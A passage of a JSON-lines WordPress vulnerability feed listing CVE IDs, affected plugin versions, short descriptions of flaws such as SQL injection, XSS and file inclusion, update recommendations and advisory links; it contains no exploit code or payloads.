version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3244300%40ltl-freight-quotes-purolator-freight-edition&new=3244300%40ltl-freight-quotes-purolator-freight-edition&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3244300%40ltl-freight-quotes-purolator-freight-edition&new=3244300%40ltl-freight-quotes-purolator-freight-edition&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2db0b8c9-7908-484d-9a02-1c50f88efdd0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2db0b8c9-7908-484d-9a02-1c50f88efdd0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12061","slug":"events-addon-for-elementor","versionImpact":"2.2.3","versionEndExcluding":"2.2.4","description":"The Events Addon for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.2.3 via the naevents_elementor_template shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.","recommendation":"Update to version 2.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3208546%40events-addon-for-elementor&new=3208546%40events-addon-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3208546%40events-addon-for-elementor&new=3208546%40events-addon-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f59d9d8a-467a-4920-963a-da45f1f4462f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f59d9d8a-467a-4920-963a-da45f1f4462f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7712","slug":"madara-core","versionImpact":"2.2.3","versionEndExcluding":"2.2.4","description":"The Madara - Core plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the wp_manga_delete_zip() function in all versions up to, and including, 2.2.3. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 2.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/mangabooth.com\\\/product\\\/wp-manga-theme-madara\\\/\",\"name\":\"https:\\\/\\\/mangabooth.com\\\/product\\\/wp-manga-theme-madara\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9de8e90-5bda-4ab1-aa78-2748cd717376?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9de8e90-5bda-4ab1-aa78-2748cd717376?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8922","slug":"enquiry-quotation-for-woocommerce","versionImpact":"2.2.33.33","versionEndExcluding":"2.2.33.34","description":"The Product Enquiry for WooCommerce, WooCommerce product catalog plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.2.33.32 via deserialization of untrusted input in enquiry_detail.php. This makes it possible for authenticated attackers, with Author-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 2.2.33.34, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a485314-cd68-400c-b398-2f8529c6a3ab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a485314-cd68-400c-b398-2f8529c6a3ab?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3155863\\\/enquiry-quotation-for-woocommerce\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3155863\\\/enquiry-quotation-for-woocommerce\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7146","slug":"jet-tabs","versionImpact":"2.2.3","versionEndExcluding":"2.2.3.1","description":"The JetTabs for Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.2.3 via the 'switcher_preset' parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 2.2.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a401a2dd-9b31-47d9-b841-f2e7042b8333?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a401a2dd-9b31-47d9-b841-f2e7042b8333?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/crocoblock.com\\\/plugins\\\/jettabs\\\/\",\"name\":\"https:\\\/\\\/crocoblock.com\\\/plugins\\\/jettabs\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4635","slug":"eventon-lite","versionImpact":"2.2.2","versionEndExcluding":"2.2.3","description":"The EventON plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in versions up to, and including, 2.2.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/115ad0b2-febe-485a-8fb5-9bd6edc37ef7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/115ad0b2-febe-485a-8fb5-9bd6edc37ef7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/xsn1210\\\/vul\\\/blob\\\/main\\\/xss%5BEventON%5D%20.md\",\"name\":\"https:\\\/\\\/github.com\\\/xsn1210\\\/vul\\\/blob\\\/main\\\/xss%5BEventON%5D%20.md\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0219","slug":"fluent-smtp","versionEndExcluding":"2.2.3","description":"The FluentSMTP WordPress plugin before 2.2.3 does not sanitize or escape email content, making it vulnerable to stored cross-site scripting attacks (XSS) when an administrator views the email logs. This exploit requires other plugins to enable users to send emails with unfiltered HTML.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/71662b72-311c-42db-86c5-a0276d25535c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/71662b72-311c-42db-86c5-a0276d25535c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8983","slug":"custom-twitter-feeds","versionImpact":"2.2.2","versionEndExcluding":"2.2.3","description":"Custom Twitter Feeds  WordPress plugin before 2.2.3 is not filtering some of its settings allowing high privilege users to inject scripts.","recommendation":"Update to version 2.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/29194dde-8d11-4096-a5ae-1d69c2c5dc33\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/29194dde-8d11-4096-a5ae-1d69c2c5dc33\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11715","slug":"wp-job-portal","versionImpact":"2.2.2","versionEndExcluding":"2.2.3","description":"The WP Job Portal \u2013 A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the assignUserRole() function in all versions up to, and including, 2.2.2. This makes it possible for unauthenticated attackers to elevate their privileges to that of an employer.","recommendation":"Update to version 2.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/gist.github.com\\\/tvnnn\\\/9b706643c5f88989c98815be8b101e11\",\"name\":\"https:\\\/\\\/gist.github.com\\\/tvnnn\\\/9b706643c5f88989c98815be8b101e11\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202327\\\/wp-job-portal\\\/tags\\\/2.2.3\\\/modules\\\/user\\\/controller.php?old=3187129&old_path=wp-job-portal%2Ftags%2F2.2.2%2Fmodules%2Fuser%2Fcontroller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202327\\\/wp-job-portal\\\/tags\\\/2.2.3\\\/modules\\\/user\\\/controller.php?old=3187129&old_path=wp-job-portal%2Ftags%2F2.2.2%2Fmodules%2Fuser%2Fcontroller.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4107199d-e3c7-4379-b39d-1868de7d777b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4107199d-e3c7-4379-b39d-1868de7d777b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11714","slug":"wp-job-portal","versionImpact":"2.2.2","versionEndExcluding":"2.2.3","description":"The WP Job Portal \u2013 A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to SQL Injection via the 'ff' parameter of the getFieldsForVisibleCombobox() function in all versions up to, and including, 2.2.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/gist.github.com\\\/g1-nhantv\\\/60182158e1d763b2f4c3b5e2972b6961#file-fieldordering_model-php-L6\",\"name\":\"https:\\\/\\\/gist.github.com\\\/g1-nhantv\\\/60182158e1d763b2f4c3b5e2972b6961#file-fieldordering_model-php-L6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202327\\\/wp-job-portal\\\/tags\\\/2.2.3\\\/modules\\\/fieldordering\\\/model.php?old=3187129&old_path=wp-job-portal%2Ftags%2F2.2.2%2Fmodules%2Ffieldordering%2Fmodel.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202327\\\/wp-job-portal\\\/tags\\\/2.2.3\\\/modules\\\/fieldordering\\\/model.php?old=3187129&old_path=wp-job-portal%2Ftags%2F2.2.2%2Fmodules%2Ffieldordering%2Fmodel.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/505858dc-c420-484c-a067-6962836eea6a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/505858dc-c420-484c-a067-6962836eea6a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11713","slug":"wp-job-portal","versionImpact":"2.2.2","versionEndExcluding":"2.2.3","description":"The WP Job Portal \u2013 A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to SQL Injection via the 'page_id' parameter of the wpjobportal_deactivate() function in all versions up to, and including, 2.2.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/gist.github.com\\\/g1-nhantv\\\/08ea67adc67d1ba98bf56c4fae5aec0f#file-deactivation-php-L11\",\"name\":\"https:\\\/\\\/gist.github.com\\\/g1-nhantv\\\/08ea67adc67d1ba98bf56c4fae5aec0f#file-deactivation-php-L11\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202327\\\/wp-job-portal\\\/tags\\\/2.2.3\\\/includes\\\/deactivation.php?old=3187129&old_path=wp-job-portal%2Ftags%2F2.2.2%2Fincludes%2Fdeactivation.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202327\\\/wp-job-portal\\\/tags\\\/2.2.3\\\/includes\\\/deactivation.php?old=3187129&old_path=wp-job-portal%2Ftags%2F2.2.2%2Fincludes%2Fdeactivation.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d67675a-b77b-41c6-a94f-d9385e609b37?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d67675a-b77b-41c6-a94f-d9385e609b37?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11712","slug":"wp-job-portal","versionImpact":"2.2.2","versionEndExcluding":"2.2.3","description":"The WP Job Portal \u2013 A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the getResumeFileDownloadById() function in all versions up to, and including, 2.2.2. This makes it possible for unauthenticated attackers to download other users resumes.","recommendation":"Update to version 2.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/gist.github.com\\\/g1-nhantv\\\/245d2829c1b489f61c9124086506b6b8\",\"name\":\"https:\\\/\\\/gist.github.com\\\/g1-nhantv\\\/245d2829c1b489f61c9124086506b6b8\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/gist.github.com\\\/g1-nhantv\\\/7a26a9681eb3413d8be9323fb151fdcd\",\"name\":\"https:\\\/\\\/gist.github.com\\\/g1-nhantv\\\/7a26a9681eb3413d8be9323fb151fdcd\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202327\\\/wp-job-portal\\\/tags\\\/2.2.3\\\/modules\\\/resume\\\/model.php?old=3187129&old_path=wp-job-portal%2Ftags%2F2.2.2%2Fmodules%2Fresume%2Fmodel.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202327\\\/wp-job-portal\\\/tags\\\/2.2.3\\\/modules\\\/resume\\\/model.php?old=3187129&old_path=wp-job-portal%2Ftags%2F2.2.2%2Fmodules%2Fresume%2Fmodel.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ecc87d5f-dba4-40f8-946f-f2634614b579?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ecc87d5f-dba4-40f8-946f-f2634614b579?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11711","slug":"wp-job-portal","versionImpact":"2.2.1","versionEndExcluding":"2.2.3","description":"The WP Job Portal \u2013 A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to SQL Injection via the 'resumeid' parameter in all versions up to, and including, 2.2.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/gist.github.com\\\/g1-nhantv\\\/b388ef3b4ff57c69f719c363d7fea399#file-resume_model-php-L35\",\"name\":\"https:\\\/\\\/gist.github.com\\\/g1-nhantv\\\/b388ef3b4ff57c69f719c363d7fea399#file-resume_model-php-L35\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202327\\\/wp-job-portal\\\/tags\\\/2.2.3\\\/modules\\\/resume\\\/model.php?old=3187129&old_path=wp-job-portal%2Ftags%2F2.2.2%2Fmodules%2Fresume%2Fmodel.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202327\\\/wp-job-portal\\\/tags\\\/2.2.3\\\/modules\\\/resume\\\/model.php?old=3187129&old_path=wp-job-portal%2Ftags%2F2.2.2%2Fmodules%2Fresume%2Fmodel.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d8961fd-68ac-4a10-ab26-cfcda27c18e8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d8961fd-68ac-4a10-ab26-cfcda27c18e8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11710","slug":"wp-job-portal","versionImpact":"2.2.2","versionEndExcluding":"2.2.3","description":"The WP Job Portal \u2013 A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to SQL Injection via the 'fieldfor', 'visibleParent' and 'id' parameters in all versions up to, and including, 2.2.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/gist.github.com\\\/g1-nhantv\\\/40e061bbd2aa26bb89060aff7879feb1\",\"name\":\"https:\\\/\\\/gist.github.com\\\/g1-nhantv\\\/40e061bbd2aa26bb89060aff7879feb1\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202327\\\/wp-job-portal\\\/tags\\\/2.2.3\\\/modules\\\/fieldordering\\\/model.php?old=3187129&old_path=wp-job-portal%2Ftags%2F2.2.2%2Fmodules%2Ffieldordering%2Fmodel.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202327\\\/wp-job-portal\\\/tags\\\/2.2.3\\\/modules\\\/fieldordering\\\/model.php?old=3187129&old_path=wp-job-portal%2Ftags%2F2.2.2%2Fmodules%2Ffieldordering%2Fmodel.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80fcaea8-5837-4d8c-afef-b9ed4fd31227?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80fcaea8-5837-4d8c-afef-b9ed4fd31227?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6570","slug":"glossary-by-codeat","versionImpact":"2.2.26","versionEndExcluding":"2.2.27","description":"The Glossary plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 2.2.26. This is due the plugin utilizing wpdesk and not preventing direct access to the test files along with display_errors being enabled. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 2.2.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/593b2ea2-0627-45ce-b672-cc815bff338b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/593b2ea2-0627-45ce-b672-cc815bff338b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3118151%40glossary-by-codeat&new=3118151%40glossary-by-codeat&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3118151%40glossary-by-codeat&new=3118151%40glossary-by-codeat&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3116892%40glossary-by-codeat&new=3116892%40glossary-by-codeat&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3116892%40glossary-by-codeat&new=3116892%40glossary-by-codeat&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3116269%40glossary-by-codeat&new=3116269%40glossary-by-codeat&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3116269%40glossary-by-codeat&new=3116269%40glossary-by-codeat&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0895","slug":"3d-flipbook-dflip-lite","versionImpact":"2.2.26","versionEndExcluding":"2.2.27","description":"The PDF Flipbook, 3D Flipbook \u2013 DearFlip plugin for WordPress is vulnerable to Stored Cross-Site Scripting via outline settings in all versions up to, and including, 2.2.26 due to insufficient input sanitization and output escaping on user supplied data. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92e37b28-1a17-417a-b40f-cb4bbe6ec759?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92e37b28-1a17-417a-b40f-cb4bbe6ec759?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/3d-flipbook-dflip-lite\\\/trunk\\\/inc\\\/metaboxes.php#L483\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/3d-flipbook-dflip-lite\\\/trunk\\\/inc\\\/metaboxes.php#L483\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030441%403d-flipbook-dflip-lite&new=3030441%403d-flipbook-dflip-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030441%403d-flipbook-dflip-lite&new=3030441%403d-flipbook-dflip-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5431","slug":"wp-cafe","versionImpact":"2.2.25","versionEndExcluding":"2.2.26","description":"The WPCafe \u2013 Online Food Ordering, Restaurant Menu, Delivery, and Reservations for WooCommerce plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.2.25 via the reservation_extra_field shortcode parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, potentially resulting in code execution.","recommendation":"Update to version 2.2.26, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c5e7ed1-7eb8-4ce7-9dd6-0f7937b6f671?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c5e7ed1-7eb8-4ce7-9dd6-0f7937b6f671?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-cafe\\\/tags\\\/2.2.25\\\/core\\\/shortcodes\\\/views\\\/reservation\\\/reservation-form-template.php#L178\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-cafe\\\/tags\\\/2.2.25\\\/core\\\/shortcodes\\\/views\\\/reservation\\\/reservation-form-template.php#L178\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1855","slug":"wp-cafe","versionImpact":"2.2.23","versionEndExcluding":"2.2.24","description":"The WPCafe \u2013 Restaurant Menu, Online Ordering for WooCommerce, Pickup \/ Delivery and Table Reservation plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.2.23 via the wpc_check_for_submission function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application.","recommendation":"Update to version 2.2.24, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f83c19e-1b75-4fea-b4de-f7f844a449c0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f83c19e-1b75-4fea-b4de-f7f844a449c0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-cafe\\\/trunk\\\/core\\\/action\\\/wpc-ajax-action.php#L76\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-cafe\\\/trunk\\\/core\\\/action\\\/wpc-ajax-action.php#L76\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084054\\\/wp-cafe\\\/trunk\\\/core\\\/action\\\/wpc-ajax-action.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084054\\\/wp-cafe\\\/trunk\\\/core\\\/action\\\/wpc-ajax-action.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0278","slug":"geodirectory","versionEndExcluding":"2.2.24","description":"The GeoDirectory WordPress plugin before 2.2.24 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/98deb84e-01ca-4b70-a8f8-0a226daa85a6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/98deb84e-01ca-4b70-a8f8-0a226daa85a6\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/bulletin.iese.de\\\/post\\\/geodirectory_2-2-21\",\"name\":\"https:\\\/\\\/bulletin.iese.de\\\/post\\\/geodirectory_2-2-21\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4398","slug":"html5-audio-player","versionImpact":"2.2.19","versionEndExcluding":"2.2.22","description":"The HTML5 Audio Player- Best WordPress Audio Player Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 2.2.19 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca646202-b9e2-4272-b0e2-d39cd748fb8e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca646202-b9e2-4272-b0e2-d39cd748fb8e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-audio-player\\\/trunk\\\/inc\\\/Elementor\\\/Widgets\\\/Simple.php#L237\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-audio-player\\\/trunk\\\/inc\\\/Elementor\\\/Widgets\\\/Simple.php#L237\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-audio-player\\\/trunk\\\/inc\\\/elementor-widgets\\\/fusion-audio-player.php#L275\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-audio-player\\\/trunk\\\/inc\\\/elementor-widgets\\\/fusion-audio-player.php#L275\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-audio-player\\\/trunk\\\/inc\\\/elementor-widgets\\\/stamp-audio-player.php#L286\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-audio-player\\\/trunk\\\/inc\\\/elementor-widgets\\\/stamp-audio-player.php#L286\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-audio-player\\\/trunk\\\/inc\\\/elementor-widgets\\\/playlist.php#L541\",\"name\":\"https:\\\/\\\/plugins.trac.wo